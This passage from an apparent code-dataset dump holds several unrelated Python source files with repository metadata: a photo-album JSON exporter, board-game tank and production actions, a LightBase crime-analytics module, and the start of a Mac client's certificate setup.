anchor = new_chapter.get('anchor', None)
if anchor is None:
anchor = self._anchor(new_chapter['title'])
content.append({
'type': 'title',
'text': new_chapter['title'],
'anchor': anchor,
})
if new_chapter and new_chapter.get('subtitle'):
if new_chapter['subtitle'] == 'daily':
daily_subs = True
content.append({
'type': 'subtitle',
'date': to_utc_timestamp(pic.sort_date),
'anchor': pic.sort_date.strftime(
"day-%Y-%m-%d"
),
})
else:
daily_subs = False
content.append({
'type': 'subtitle',
'text': new_chapter['subtitle'],
'anchor': self._anchor(
new_chapter['subtitle']
),
})
elif new_chapter:
daily_subs = False
if (daily_titles or daily_subs) and not new_chapter \
and day > previous_day:
content.append({
'type': 'subtitle' if daily_subs else 'title',
'date': to_utc_timestamp(pic.sort_date),
'anchor': pic.sort_date.strftime(
"day-%Y-%m-%d"
),
})
pic_dict = pic.build_dict(
self.config.resized_photos_url
)
# If we do not have a cover, we take the first picture
if cover is None:
cover = pic_dict.copy()
for resize in pic.resized_pictures.where(
ResizedPicture.successfully_created
).where(
ResizedPicture.size << self.config.sizes_in_json
):
pic_dict[resize.size.name] = [
resize.width,
resize.height,
]
content.append(pic_dict)
previous_day = day
json_name = '%s.json' % album.slug
album_titles.append(string.capwords(album.title))
album_slugs.append(album.slug)
album_dict = {
'title': string.capwords(album.title),
'start_date': to_utc_timestamp(album.start_date),
'end_date': to_utc_timestamp(album.end_date),
'json': os.path.join('albums', json_name),
'slug': album.slug,
'total': pics.count(),
'cover': cover,
}
album_list.append(album_dict.copy())
album_dict['content'] = content
if album.description:
album_dict['description'] = album.description
if album.meta:
album_dict['meta'] = pickle.loads(album.meta)
write_json(os.path.join(abs_dir, json_name), album_dict)
write_json(
os.path.join(self.output_dir, 'albums.json'),
{
'titles': album_titles,
'albums': album_list,
'slugs': album_slugs,
},
)
def _generate_timeline_page(self, year=None, include_album_photos=False):
if include_album_photos:
base_query = Picture.select()\
.where(Picture.sort_date.is_null(False))
else:
base_query = Picture.select()\
.join(AlbumPicture, peewee.JOIN.LEFT_OUTER)\
.join(Album, peewee.JOIN.LEFT_OUTER)\
.where(Album.id.is_null())\
.where(Picture.sort_date.is_null(False))
if year is not None:
base_query = base_query.where(
(Picture.sort_date >= datetime.datetime(year, 1, 1)) &
(Picture.sort_date < datetime.datetime(year + 1, 1, 1))
)
base_query = base_query.order_by(Picture.sort_date.desc())
total = base_query.count()
if not total:
return None
# Create the destination directories
dir_name = 'including' if include_album_photos else 'excluding'
dest = os.path.join(self.output_dir, 'timeline', dir_name)
if not check_and_create_dir(dest, create=True):
return None
if year is not None:
dest = os.path.join(dest, "%s" % year)
if not check_and_create_dir(dest, create=True):
return None
nr_of_pages = (total // self.config.photos_per_json_file) + \
(1 if total % self.config.photos_per_json_file else 0)
def _get_timeline_pics(base_query, page=0):
page += 1
pics = base_query.paginate(
page, self.config.photos_per_json_file
)
return pics, page
if self.config.timeline_granularity == 'daily':
l1, l2, f1, f2 = 'month', 'day', 'month-%Y-%m', 'day-%Y-%m-%d'
else:
l1, l2, f1, f2 = 'year', 'month', 'year-%Y', 'month-%Y-%m'
pages = []
pics, page = _get_timeline_pics(base_query)
previous_date = None
label = '{:>7}'.format("%s | " % year if year else " All | ")
label += "including:" if include_album_photos else "excluding:"
with click.progressbar(length=nr_of_pages, label=label,
show_pos=True) as bar:
while pics.count():
content = []
for pic in pics:
date = pic.sort_date
timestamp = to_utc_timestamp(date)
if previous_date is None or not \
getattr(date, l1) == getattr(previous_date, l1):
content.append({
'type': "title-%s" % l1,
'date': timestamp,
'anchor': date.strftime(f1),
})
if previous_date is None or not \
getattr(date, l2) == getattr(previous_date, l2):
content.append({
'type': "subtitle-%s" % l2,
'date': timestamp,
'anchor': date.strftime(f2),
})
pic_dict = pic.build_dict(self.config.resized_photos_url)
for resize in pic.resized_pictures.where(
ResizedPicture.successfully_created
).where(
ResizedPicture.size << self.config.sizes_in_json
):
pic_dict[resize.size.name] = [
resize.width,
resize.height,
]
content.append(pic_dict)
previous_date = date
if not pages:
pages.append(to_utc_timestamp(pics[0].sort_date))
pages.append(to_utc_timestamp(pics[pics.count() - 1].sort_date))
write_json(
os.path.join(dest, '%s.json' % page),
{'content': content, 'page': page, },
)
bar.update(1)
pics, page = _get_timeline_pics(base_query, page=page)
return pages
def _generate_timeline_json(self):
timeline_dir = os.path.join(self.output_dir, 'timeline')
if not check_and_create_dir(timeline_dir, create=True):
return fatal_error('Could not create Timeline directory.')
timeline = {
'including': {'years': {}, },
'excluding': {'years': {}, },
'page_dir': 'timeline',
}
first_year = Picture.select()\
.where(Picture.sort_date.is_null(False))\
.order_by(Picture.sort_date.asc())\
.limit(1)[0].sort_date.year
last_year = Picture.select()\
.where(Picture.sort_date.is_null(False))\
.order_by(Picture.sort_date.desc())\
.limit(1)[0].sort_date.year
# Generate complete timeline:
# 1. Including album photos
timeline['including']['pages'] = self._generate_timeline_page(
include_album_photos=True
)
# 2. Excluding album photos
timeline['excluding']['pages'] = self._generate_timeline_page()
# The same per year.
for year in range(first_year, last_year + 1):
timeline['including']['years'][year] = \
self._generate_timeline_page(year=year,
include_album_photos=True)
timeline['excluding']['years'][year] = \
self._generate_timeline_page(year=year)
write_json(os.path.join(self.output_dir, 'timeline.json'), timeline)
def generate(self, albums=True, timeline=True):
# Generate JSON
if albums:
click.echo("Generating json for albums... ", nl=False)
self._generate_albums_json()
click.echo("Done.")
if timeline:
click.echo("Generating json for the timeline... ", nl=False)
self._generate_timeline_json()
click.echo("Done.")
click.echo("Exported json files to: %s" % self.output_dir)
|
mit
| -8,358,376,157,967,591,000 | 42.25 | 80 | 0.449284 | false |
PiotrZakrzewski/steamweb
|
steamweb/actions/tank_actions.py
|
1
|
10949
|
from itertools import combinations
from steamweb.actions_base import PlayerAction
from steamweb.models import *
from steamweb.db_utils import get_price, get_tile
from steamweb.utils import tanks_left
from steamweb.production_utils import get_bonus, energy_cost
resources = ["water", "ore", "quartz", "energy"]
class PlaceAirship(PlayerAction):
def resolution(self, game, player, arguments):
y = arguments['y']
if y >= game.map_height or y < 0:
raise ValueError("Y coordinate {} is outside of map height ({})".format(y, game.map_height))
tiles = Tile.query.filter(Tile.game == game.id).all()
on_river = [tile for tile in tiles if tile.y == y]
for tile in on_river:
tile.airship_bonus = True
game.phase = 'tank'
game.active_player = game.get_order()[0]
def domain(self, game, player):
domain = [{'y': y} for y in range(game.map_height)]
return ('set', domain)
def get_phases(self):
return ['airship_placing']
def get_arguments(self):
return [('y', int)]
class ActivateTankPhase(PlayerAction):
def resolution(self, game, player, arguments):
if player.water < 1:
raise ValueError(
"Activating tank phase requires 1 water player{} has {}".format(player.id, player.water))
if player.active_tank_phase:
raise ValueError("Tank phase already active")
player.active_tank_phase = True
player.water -= 1
def get_phases(self):
return ['tank']
class BuyTank(PlayerAction):
def resolution(self, game, player, arguments):
x = arguments['x']
y = arguments['y']
tiles = Tile.query.filter(Tile.game == game.id).all()
tiles = [tile for tile in tiles if tile.x == x and tile.y == y]
assert len(tiles) < 2 # more than 1 means db or configuration error
if not len(tiles) == 1:
raise ValueError("No tile of coordinates X:{} Y:{}".format(x, y))
tile = tiles[0]
if not tile.owner == player.id:
raise ValueError(
"Tile of coordinates X:{} Y:{} does not belong to player {}".format(x, y, player.id))
price = get_price(game, 'tank')
if not can_afford(player, price):
raise ValueError("Cannot afford buying a tank")
pay_price(player, price)
tile.tank = True
def domain(self, game, player):
if not tanks_left(game):
return ('set', [])
price = get_price(game, 'tank')
if not can_afford(player, price):
return ('set', [])
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = [{'x': tile.x, 'y': tile.y} for tile in tiles if tile.owner == player.id and not tile.tank]
return ('set', domain)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('x', int), ('y', int)]
def clear_extractors(tile):
for extractor_name in addons:
if not extractor_name == 'supercharger':
setattr(tile, extractor_name, False)
addons = ["ore_extractor", "energy_extractor", "quartz_extractor", "supercharger"]
class BuyAddon(PlayerAction):
def resolution(self, game, player, arguments):
x = arguments['x']
y = arguments['y']
addon_name = arguments['addon']
if addon_name not in addons:
raise ValueError("Addon {} does not exist".format(addon_name))
tiles = Tile.query.filter(Tile.game == game.id).all()
tiles = [tile for tile in tiles if tile.x == x and tile.y == y]
assert len(tiles) < 2 # more than 1 means db or configuration error
if not len(tiles) == 1:
raise ValueError("No tile of coordinates X:{} Y:{}".format(x, y))
tile = tiles[0]
if not tile.owner == player.id:
raise ValueError(
"Tile of coordinates X:{} Y:{} does not belong to player {}".format(x, y, player.id))
if not tile.tank:
raise ValueError("You cannot buy a converter for a tile without a tank")
if getattr(tile, addon_name):
raise ValueError("Addon is already present on this tile")
price = get_price(game, addon_name)
if not can_afford(player, price):
raise ValueError("Cannot afford this addon")
if not addon_name == 'supercharger':
clear_extractors(tile)
pay_price(player, price)
setattr(tile, addon_name, True) # handle case when there is already a converter on the tile
def domain(self, game, player):
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = [{'x': tile.x, 'y': tile.y} for tile in tiles if (tile.owner == player.id and tile.tank and not has_extractor(tile) )]
with_addons = []
for tile in domain:
for addon in addons:
price = get_price(game, addon)
if not can_afford(player, price):
continue
_tile = dict(tile)
_tile['addon'] = addon
with_addons.append(_tile)
supercharger_price = get_price(game, "supercharger")
if can_afford(player, supercharger_price):
with_ext_no_charger = [{'x': tile.x, 'y': tile.y, 'addon':'supercharger'} for tile in tiles if (tile.owner == player.id and tile.tank and has_extractor(tile) and not tile.supercharger )]
for tile in with_ext_no_charger:
_tile = dict(tile)
with_addons.append(_tile)
return ('set', with_addons)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('x', int), ('y', int), ('addon', str)]
class UpgradeCarrier(PlayerAction):
def resolution(self, game, player, arguments):
max_tier = 3 # zero indexed
carrier_name = arguments['name']
if not carrier_name in ['water_carrier', 'ore_carrier', 'quartz_carrier', 'energy_carrier']:
raise ValueError("No carrier like: {}".format(carrier_name))
price = get_price(game, 'carrier_upgrade')
current_tier = getattr(player, carrier_name)
if current_tier == max_tier:
raise ValueError("Already at the highest tier for this carrier")
if not can_afford(player, price):
raise ValueError("Cannot afford carrier upgrade")
pay_price(player, price)
print("current carrier: {}".format(current_tier))
setattr(player, carrier_name , current_tier + 1)
def get_phases(self):
return ['tank']
def get_arguments(self):
return [('name', str)]
def domain(self, game, player):
domain = []
for resource in resources:
carrier_name = resource +"_carrier"
if getattr(player, carrier_name) < 3:
domain.append({'name':carrier_name})
return ('set', domain)
def has_extractor(tile):
for addon in addons:
if addon == "supercharger":
continue
if getattr(tile, addon):
return True
return False
class Produce(PlayerAction):
def resolution(self, game, player, arguments):
resource = arguments['resource']
positions = arguments['tiles'] # list of tiles to produce from
if resource not in resources:
raise ValueError("Resource {} does not exist".format(resource))
tiles = [get_tile(game, pos['x'], pos['y']) for pos in positions]
for tile in tiles:
if not tile.tank: # TODO: verify that all the tiles are capable of producing given resource
raise ValueError("Tiles need to have a tank in order to produce")
extractor = "{}_extractor".format(resource)
for tile in tiles:
if tile.used:
raise ValueError("Selection contains tiles which were already used")
for tile in tiles:
if not getattr(tile, extractor):
raise ValueError("All selected tiles need to have a correct extractor")
superchargers = [tile for tile in tiles if tile.supercharger]
airship_tiles = [tile for tile in tiles if tile.airship_bonus]
_bonus = get_bonus(tiles)
quantity_produced = _bonus + len(positions) + len(superchargers) + len(airship_tiles)
energy_needed = energy_cost(tiles, resource)
if player.energy < energy_needed:
raise ValueError(
"Insufficient energy ({}) to produce on {} tiles".format(energy_needed, len(positions)))
current_quantity = getattr(player, resource)
capacity = getattr(player, "get_{}_capacity".format(resource))
_cap = capacity()
new_quantity = min((current_quantity + quantity_produced), _cap)
setattr(player, resource, new_quantity)
player.energy -= energy_needed
for tile in tiles:
tile.used = True
tile.selected = False
def domain(self, game, player):
tiles = Tile.query.filter(Tile.game == game.id).all()
domain = []
for resource in resources:
extractor = "{}_extractor".format(resource)
tiles_ = [{'x': tile.x, 'y': tile.y} for tile in tiles if (tile.owner == player.id and tile.tank and getattr(tile, extractor) and not tile.used )]
limit = min(player.energy, len(tiles_))
valid_combinations = list(combinations(tiles_, limit))
if not valid_combinations:
continue
resource_domain = [{"tiles":vt, "resource":resource } for vt in valid_combinations]
domain.extend(resource_domain)
return ('set', domain)
def get_phases(self):
return ['production']
def get_arguments(self):
return [ ('tiles', list), ('resource', str)]
def pay_price(player, price):
if price.water > player.water:
raise ValueError("Not enough water to pay for {}".format(price.item))
if price.energy > player.energy:
raise ValueError("Not enough energy to pay for {}".format(price.item))
if price.quartz > player.quartz:
raise ValueError("Not enough quartz to pay for {}".format(price.item))
if price.ore > player.ore:
raise ValueError("Not enough ore to pay for {}".format(price.item))
if price.cash > player.cash:
raise ValueError("Not enough cash to pay for {}".format(price.item))
player.water -= price.water
player.energy -= price.energy
player.ore -= price.ore
player.quartz -= price.quartz
player.cash -= price.cash
def can_afford(player, price):
if price.water > player.water:
return False
if price.energy > player.energy:
return False
if price.quartz > player.quartz:
return False
if price.ore > player.ore:
return False
if price.cash > player.cash:
return False
return True
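# Illustrative sketch (not part of the original module): how the actions
# above are expected to combine the two helpers; check first, then pay,
# so a failed purchase never mutates the player's resources.
def _example_purchase(game, player):
    price = get_price(game, 'tank')
    if not can_afford(player, price):
        raise ValueError("Cannot afford buying a tank")
    pay_price(player, price)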
|
mit
| 950,754,138,832,440,800 | 38.103571 | 198 | 0.598228 | false |
lightbase/LBSociam
|
lbsociam/model/analytics.py
|
1
|
25138
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'eduardo'
import time
import logging
import datetime
import requests
import json
from requests.exceptions import HTTPError
from lbsociam import LBSociam
from lbsociam.model import lbstatus
from liblightbase import lbrest
from liblightbase.lbbase.struct import Base, BaseMetadata
from liblightbase.lbbase.lbstruct.group import *
from liblightbase.lbbase.lbstruct.field import *
from liblightbase.lbbase.content import Content
from liblightbase.lbutils import conv
from liblightbase.lbsearch.search import *
from pyramid.response import Response
from operator import itemgetter
from multiprocessing import Queue, Process
from requests.exceptions import ConnectionError
log = logging.getLogger()
class AnalyticsBase(LBSociam):
"""
Criminal data analytics base
"""
def __init__(self, status_base=None):
"""
Constructor for social networks data.
:return:
"""
LBSociam.__init__(self)
self.baserest = lbrest.BaseREST(
rest_url=self.lbgenerator_rest_url,
response_object=True
)
self.documentrest = lbrest.DocumentREST(
rest_url=self.lbgenerator_rest_url,
base=self.lbbase,
response_object=False
)
# Get status base in constructor
if status_base is None:
self.status_base = lbstatus.status_base
else:
self.status_base = status_base
@property
def lbbase(self):
"""
Generate LB Base object
:return:
"""
analysis_date = Field(**dict(
name='analysis_date',
description='Analysis date',
alias='analysis_date',
datatype='DateTime',
indices=['Ordenado'],
multivalued=False,
required=True
))
analysis_end_date = Field(**dict(
name='analysis_end_date',
description='Analysis end date',
alias='analysis_date',
datatype='DateTime',
indices=[],
multivalued=False,
required=False
))
total_status = Field(**dict(
name='total_status',
description='Total Status Analyzed',
alias='total_status',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=True
))
total_crimes = Field(**dict(
name='total_crimes',
description='Total Crimes Identified',
alias='total_crimes',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=True
))
total_positives = Field(**dict(
name='total_positives',
description='Total positive status',
alias='total_positives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
# Add states analysis
state_list = Content()
state_uf = Field(**dict(
name='state_uf',
description='State UF',
alias='UF',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
state_list.append(state_uf)
state_name = Field(**dict(
name='state_name',
description='State Name',
alias='Estado',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
state_list.append(state_name)
category_list = Content()
category_id_doc = Field(**dict(
name='category_id_doc',
description='Category ID',
alias='ID Categoria',
datatype='Integer',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_id_doc)
category_name = Field(**dict(
name='category_name',
description='Category Name',
alias='Categoria',
datatype='Text',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_name)
category_status = Field(**dict(
name='category_status',
description='Category Status Ocurrences',
alias='Status',
datatype='Integer',
indices=[],
multivalued=False,
required=False
))
category_list.append(category_status)
category_metadata = GroupMetadata(**dict(
name='category',
alias='Categoria',
description='Categories data',
multivalued=True
))
category = Group(
metadata=category_metadata,
content=category_list
)
# Add to state group
state_list.append(category)
state_metadata = GroupMetadata(**dict(
name='state',
alias='Estado',
description='States Data',
multivalued=True
))
state = Group(
metadata=state_metadata,
content=state_list
)
status_list = Content()
status_id_doc = Field(**dict(
name='status_id_doc',
description='Identified status id_doc',
alias='status_id_doc',
datatype='Integer',
indices=['Ordenado', 'Unico'],
multivalued=False,
required=False
))
status_list.append(status_id_doc)
status_positives = Field(**dict(
name='status_positives',
description='Number of positives for status',
alias='status_positives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
status_list.append(status_positives)
status_negatives = Field(**dict(
name='status_negatives',
description='Number of negatives for status',
alias='status_negatives',
datatype='Integer',
indices=['Ordenado'],
multivalued=False,
required=False
))
status_list.append(status_negatives)
status_metadata = GroupMetadata(**dict(
name='status_crimes',
alias='status_crimes',
description='Status identified as crimes',
multivalued=True
))
status_crimes = Group(
metadata=status_metadata,
content=status_list
)
base_metadata = BaseMetadata(**dict(
name='analytics',
description='Criminal data analytics base',
password='123456',
idx_exp=False,
idx_exp_url='index_url',
idx_exp_time=300,
file_ext=True,
file_ext_time=300,
color='#FFFFFF'
))
content_list = Content()
content_list.append(analysis_date)
content_list.append(analysis_end_date)
content_list.append(total_status)
content_list.append(total_crimes)
content_list.append(status_crimes)
content_list.append(total_positives)
content_list.append(state)
lbbase = Base(
metadata=base_metadata,
content=content_list
)
return lbbase
@property
def metaclass(self):
"""
Retorna metaclass para essa base
"""
return self.lbbase.metaclass()
def create_base(self):
"""
Create a base to hold twitter information on Lightbase
:param crimes: One twitter crimes object to be base model
:return: LB Base object
"""
lbbase = self.lbbase
response = self.baserest.create(lbbase)
if response.status_code == 200:
return lbbase
else:
return None
def remove_base(self):
"""
Remove base from Lightbase
:param lbbase: LBBase object instance
:return: True or Error if base was not excluded
"""
response = self.baserest.delete(self.lbbase)
if response.status_code == 200:
return True
else:
raise IOError('Error excluding base from LB')
def update_base(self):
"""
Update base from LB Base
"""
response = self.baserest.update(self.lbbase)
if response.status_code == 200:
return True
else:
raise IOError('Error updating LB Base structure')
def get_document(self, id_doc):
"""
Get document by ID on base
"""
url = self.lbgenerator_rest_url + '/' + self.lbbase.metadata.name + '/doc/' + str(id_doc)
response = requests.get(url)
if response.status_code > 300:
return None
return response.json()
def update_document(self, id_doc, new_document):
"""
Update document
:param id_doc: Document ID
:return:
"""
document = json.dumps(new_document)
return self.documentrest.update(id=id_doc, document=document)
def update_path(self, id_doc, path, value):
"""
Update base in proposed path
"""
response = Response(content_type='application/json')
url = self.lbgenerator_rest_url + '/' + self.lbbase.metadata.name + '/doc/' + id_doc
url = url + '/' + path
params = {
'value': value
}
result = requests.put(
url=url,
data=params
)
if result.status_code >= 300:
response.status_code = 500
response.text = result.text
return response
response.status_code = 200
response.text = result
return response
def process_response(self, status_dict, id_doc):
# Get actual analytics
entry_dict = self.get_document(id_doc)
# Manually add id_doc
entry_dict['_metadata'] = dict()
entry_dict['_metadata']['id_doc'] = id_doc
if status_dict is not None:
# Find out if there are more positives
positive = False
if status_dict.get('positives') is not None:
if status_dict.get('negatives') is not None:
if status_dict['positives'] > status_dict['negatives']:
positive = True
else:
positive = True
# Now update total positives
if positive is True:
if entry_dict.get('total_positives') is None:
entry_dict['total_positives'] = 0
total_positives = int(entry_dict['total_positives']) + 1
entry_dict['total_positives'] = total_positives
# Now update total
if entry_dict.get('total_crimes') is None:
entry_dict['total_crimes'] = 0
total_crimes = int(entry_dict['total_crimes']) + 1
entry_dict['total_crimes'] = total_crimes
if entry_dict.get('status_crimes') is None:
entry_dict['status_crimes'] = []
# This is eating up all memory. Drop it
# entry_dict['status_crimes'].append({
# 'status_id_doc': status_dict['_metadata']['id_doc'],
# 'status_positives': status_dict.get('positives'),
# 'status_negatives': status_dict.get('negatives')
# })
# Now update total
if entry_dict.get('total_status') is None:
entry_dict['total_status'] = 0
total_status = int(entry_dict['total_status']) + 1
entry_dict['total_status'] = total_status
try:
result = self.update_document(id_doc, entry_dict)
except HTTPError as e:
log.error("Error updating status\n%s", e.message)
result = None
if result is None:
log.error("Error updating total status positives and negatives")
log.info("Processing finished %s", result)
return True
def process_response_categories(self, status_dict, id_doc):
# Get actual analytics
entry_dict = self.get_document(id_doc)
# Manually add id_doc
entry_dict['_metadata'] = dict()
entry_dict['_metadata']['id_doc'] = id_doc
# Check mandatory attributes on status
if status_dict is None:
log.debug("Empty status!!!")
return False
if status_dict.get('brasil_city') is None:
log.debug("Brasil City not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
if status_dict.get('category') is None:
log.debug("Category not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
if status_dict['category'].get('category_id_doc') is None:
log.debug("Category ID not found for status ID = %s", status_dict['_metadata']['id_doc'])
return False
# Now build statistics for the attributes
if entry_dict.get('state') is None:
entry_dict['state'] = list()
# Now try to find specific state
try:
uf = (item for item in entry_dict['state'] if item['state_uf'] == status_dict['brasil_city']['state_short_name']).next()
state_index = entry_dict['state'].index(uf)
# Now try to find category
try:
cat = (item for item in entry_dict['state'][state_index]['category'] if item['category_id_doc'] == status_dict['category']['category_id_doc']).next()
cat_index = entry_dict['state'][state_index]['category'].index(cat)
# Finally update category frequency
log.debug("Increasing count. Status = %s Category = %s", status_dict['_metadata']['id_doc'], status_dict['category']['category_id_doc'])
entry_dict['state'][state_index]['category'][cat_index]['category_status'] += 1
except StopIteration as e:
entry_dict['state'][state_index]['category'].append({
'category_id_doc': status_dict['category']['category_id_doc'],
'category_status': 1
})
except StopIteration as e:
# In this case there is no available
entry_dict['state'].append({
'state_uf': status_dict['brasil_city']['state_short_name'],
'category': [{
'category_id_doc': status_dict['category']['category_id_doc'],
'category_status': 1
}]
})
entry_dict['total_status'] += 1
# Finally update entry back on status
try:
result = self.update_document(id_doc, entry_dict)
except ConnectionError as e:
log.error("Error updating analytics id = %s\n%s", id_doc, e.message)
# Wait one second and try again
time.sleep(1)
result = self.process_response_categories(status_dict, id_doc)
except HTTPError as e:
log.error("Error updating status\n%s", e.message)
result = None
if result is None:
log.error("Error updating total status positives and negatives")
log.info("Processing finished %s", result)
return True
def get_latest_analysis(self, start_date, end_date=None):
"""
Get latest analysis on dates
:param start_date: Start date
:param end_date: End date
:return: Latest analysis JSON
"""
orderby = OrderBy(asc=['id_doc'])
select = ['*']
# Check if there are date filters
literal = None
if start_date is not None:
if end_date is None:
# Default to now
end_date = datetime.datetime.now()
# Use search by inclusion_datetime
literal = """analysis_date <= '%s'::date and
to_date(document->>'analysis_end_date'::text, 'YYYY-MM-DD HH24:MI:SS') <= '%s'::date """ % (
start_date.strftime("%Y-%m-%d"),
end_date.strftime("%Y-%m-%d")
)
else:
log.error("start_date must be supplied")
return None
search = Search(
select=select,
limit=None,
order_by=orderby,
literal=literal
)
url = self.documentrest.rest_url
url += "/" + self.lbbase._metadata.name + "/doc"
vars = {
'$$': search._asjson()
}
# Send the request to the REST service
response = requests.get(url, params=vars)
response_json = response.json()
results = response_json['results']
if len(results) == 0:
return {}
else:
# Get only latest analysis
escolhido = dict()
for elm in results:
if not escolhido:
escolhido = elm
elif int(escolhido['_metadata']['id_doc']) < int(elm['_metadata']['id_doc']):
escolhido = elm
log.debug(results)
log.debug("Escolhido: %s", escolhido)
return escolhido
def get_state_analysis(self, start_date, end_date=None):
"""
Get state analysis
"""
analysis = self.get_latest_analysis(
start_date=start_date,
end_date=end_date
)
output = {
'total_status': analysis['total_status']
}
for state in analysis['state']:
for cat in state['category']:
if output.get(cat['category_id_doc']) is None:
output[cat['category_id_doc']] = dict()
output[cat['category_id_doc']][state['state_uf']] = cat['category_status']
return output
def create_analysis_categories(self,
start_date,
end_date=None,
offset=0):
"""
Create analysis for the training bases calculating total positives and negatives
:param start_date: Analysis start date
:param end_date: Analysis end date
:param offset: Starting offset
:return:
"""
task_queue = Queue()
done_queue = Queue()
processes = int(self.processes)
# Get end date
if end_date is None:
end_date = datetime.datetime.now()
# First create analysis
ana = Analytics(
analysis_date=start_date,
analysis_end_date=end_date,
total_status=0,
total_crimes=0,
status_crimes=[]
)
id_doc = ana.create_analytics()
if id_doc is None:
log.error("Error creating analysis")
return None
self.status_base.documentrest.response_object = False
# Now run on every status
id_document_list = self.status_base.get_document_ids(
offset=offset,
start_date=start_date,
end_date=end_date
)
for status_id_doc in id_document_list:
task_queue.put(status_id_doc)
for i in range(processes):
# Allows the statuses to be processed in parallel
Process(target=self.worker_categories, args=(task_queue, done_queue)).start()
# Process responses
log.debug("Processing responses")
for i in range(len(id_document_list)):
status_dict = done_queue.get()
# Add retry loop if connection errors
try:
self.process_response_categories(
status_dict=status_dict,
id_doc=id_doc
)
except ConnectionError as e:
log.error("CONNECTION ERROR: connection error on %s\n%s", id_doc, e.message)
# Wait one second and retry
time.sleep(1)
self.process_response_categories(
status_dict=status_dict,
id_doc=id_doc
)
# Tell child processes to stop
for i in range(processes):
task_queue.put('STOP')
return id_doc
# Function run by worker processes
def worker_categories(self, inp, output):
for func in iter(inp.get, 'STOP'):
result = self.process_status_categories(func)
output.put(result)
def process_status_categories(self, status_id_doc):
"""
Process status
:param status_id_doc: Status id_doc
:return: Status dict stored
"""
try:
result = self.status_base.get_document(status_id_doc)
except ConnectionError as e:
log.error("CONNECTION ERROR: Error processing %s\n%s", status_id_doc, e.message)
# Try again in one second
time.sleep(1)
status_dict = self.process_status_categories(status_id_doc)
return status_dict
# JSON
status_dict = conv.document2dict(self.status_base.lbbase, result)
# Manually add id_doc
status_dict['_metadata'] = dict()
status_dict['_metadata']['id_doc'] = status_id_doc
return status_dict
def get_analysis(self, limit=10):
"""
Get analysis list
:param limit: Maximum results
:return: JSON with results
"""
orderby = OrderBy(desc=['id_doc'])
select = ['*']
search = Search(
select=select,
limit=limit,
order_by=orderby
)
url = self.documentrest.rest_url
url += "/" + self.lbbase._metadata.name + "/doc"
vars = {
'$$': search._asjson()
}
# Send the request to the REST service
response = requests.get(url, params=vars)
response_json = response.json()
return response_json
analytics_base = AnalyticsBase()
class Analytics(analytics_base.metaclass):
"""
Class that stores crime events
"""
def __init__(self, **args):
"""
Constructor for social networks data.
:return:
"""
super(Analytics, self).__init__(**args)
self.analytics_base = analytics_base
@property
def analysis_date(self):
"""
Inclusion date
:return:
"""
return analytics_base.metaclass.analysis_date.__get__(self)
@analysis_date.setter
def analysis_date(self, value):
"""
Inclusion date setter
"""
if isinstance(value, datetime.datetime):
value = value.strftime("%d/%m/%Y %H:%M:%S")
elif value is None:
value = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
else:
# Try to format string
value = datetime.datetime.strptime(value, "%d/%m/%Y %H:%M:%S").strftime("%d/%m/%Y %H:%M:%S")
analytics_base.metaclass.analysis_date.__set__(self, value)
@property
def analysis_end_date(self):
"""
Inclusion date
:return:
"""
return analytics_base.metaclass.analysis_end_date.__get__(self)
@analysis_end_date.setter
def analysis_end_date(self, value):
"""
Inclusion date setter
"""
if isinstance(value, datetime.datetime):
value = value.strftime("%d/%m/%Y %H:%M:%S")
elif value is None:
value = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
else:
# Try to format string
value = datetime.datetime.strptime(value, "%d/%m/%Y %H:%M:%S").strftime("%d/%m/%Y %H:%M:%S")
analytics_base.metaclass.analysis_end_date.__set__(self, value)
def analytics_to_dict(self):
"""
Convert analytics object to Python dict
:return: dict for crime
"""
return conv.document2dict(self.analytics_base.lbbase, self)
def analytics_to_json(self):
"""
Convert object to json
:return: JSON for crime
"""
return conv.document2json(self.analytics_base.lbbase, self)
def create_analytics(self):
"""
Insert document on base
:return: Document creation analytics
"""
document = self.analytics_to_json()
try:
result = self.analytics_base.documentrest.create(document)
except HTTPError, err:
log.error(err.strerror)
return None
return result
def update(self, id_doc):
"""
Update document
:param id_doc: Document ID
:return:
"""
document = self.analytics_to_json()
#print(document)
return self.analytics_base.documentrest.update(id=id_doc, document=document)
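# Illustrative sketch (not part of the original module): creating an empty
# analytics record for a date range, mirroring what
# AnalyticsBase.create_analysis_categories does internally.
def _example_new_analysis(start_date, end_date):
    ana = Analytics(
        analysis_date=start_date,
        analysis_end_date=end_date,
        total_status=0,
        total_crimes=0,
        status_crimes=[]
    )
    return ana.create_analytics()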
|
gpl-2.0
| 6,293,750,678,175,636,000 | 29.727384 | 165 | 0.536246 | false |
salopensource/sal-scripts
|
sal_python_pkg/sal/mac_utils.py
|
1
|
9065
|
import binascii
import datetime
import logging
import os
import pathlib
import subprocess
import time
from Foundation import (
kCFPreferencesAnyUser,
kCFPreferencesCurrentHost,
CFPreferencesSetValue,
CFPreferencesAppSynchronize,
CFPreferencesCopyAppValue,
CFPreferencesAppValueIsForced,
NSDate,
NSArray,
NSDictionary,
NSData,
NSNull,
)
from sal.client import get_sal_client, MacKeychainClient
BUNDLE_ID = "com.github.salopensource.sal"
ISO_TIME_FORMAT = "%Y-%m-%d %H:%M:%S %z"
def setup_sal_client():
ca_cert = sal_pref("CACert", "")
cert = sal_pref("SSLClientCertificate", "")
key = sal_pref("SSLClientKey", "")
    exists = [os.path.exists(p) for p in (ca_cert, cert, key)]
if any(exists):
if not all(exists):
logging.warning(
"Argument warning! If using the `CACert`, `SSLClientCertificate`, or "
"`SSLClientKey` prefs, they must all be either paths to cert files or the "
"common name of the certs to find in the keychain."
)
# If any of the above have been passed as a path, we have to
# use a vanilla Session.
logging.debug("Using SalClient")
client = get_sal_client()
else:
